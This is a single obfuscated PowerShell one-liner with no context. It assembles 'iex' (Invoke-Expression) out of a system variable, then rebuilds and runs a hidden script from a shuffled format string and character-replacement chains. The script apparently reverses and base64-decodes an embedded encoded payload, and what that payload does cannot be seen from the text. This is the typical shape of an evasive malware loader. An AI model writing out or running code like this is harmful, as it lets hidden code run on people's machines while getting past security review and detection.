 &( $VERBOsEpReFErENcE.tosTrInG()[1,3]+'x'-JOIN'')(((("{70}{73}{75}{77}{66}{48}{23}{17}{31}{90}{41}{43}{18}{25}{79}{35}{72}{14}{26}{5}{45}{8}{74}{76}{88}{39}{32}{80}{10}{52}{69}{54}{1}{56}{13}{30}{34}{11}{27}{22}{81}{62}{49}{4}{6}{63}{16}{2}{83}{71}{42}{36}{44}{19}{21}{9}{38}{86}{0}{37}{33}{24}{12}{68}{64}{60}{20}{61}{65}{92}{55}{3}{29}{51}{53}{67}{47}{50}{28}{59}{89}{58}{82}{87}{91}{78}{46}{85}{15}{57}{84}{40}{7}"-f'se64S','rAr','os','e','p -join nWe','[String]
     ','nWe
 ','
',' ','g','
   ','ray]::Rever','res','y()
','
     ','AgM','rite-h','ram','er(Posi','Tex','
Set-Va','t.Encodin','
','ng()] pa','7','t','   ','se(4G7tmp)','s ','ofsnWe nWenWe
','    [A','(',' = 4G7pa','ing(4G7tmp))
    4G','r',' =','G7result  =','tr',']::Unicode.GetString([Convert',' 4G7tmp','BQa6LA',' ','mp
    4','    [Paramet',' [',' ','ADAyAg','i','i','= 4G7tm','a','Set',' 4G7tmp ','-A','Cha','W','ra','A4CA0','ORl','-na','t-null
}
','ria','   4G7tmp ','   
    w','O4 ou','ble','lORlORl_{
    [CmdletBind','l','ult 2','= 4G7tmp.To','F','7t',' 0)]','unc',' 4G7par','tio','am1
    )
    
  ','n _OR','AgMA','ion','ram1',' ','ORl_
_/_//=OR','t 4G','AQMAoDAw','LAYDAy',']::FromBa','l= -par',' ','me _/_//=ORl= -value _ORl','
   ','am1 6LA==AA5AgNAEDAu',' n'))-rEpLAce  ([chaR]50+[chaR]79+[chaR]52),[chaR]124-CrepLaCE'nWe',[chaR]34-rEpLAce ([chaR]79+[chaR]82+[chaR]108),[chaR]92-rEpLAce '6LA',[chaR]39-CrepLaCE '4G7',[chaR]36)) 
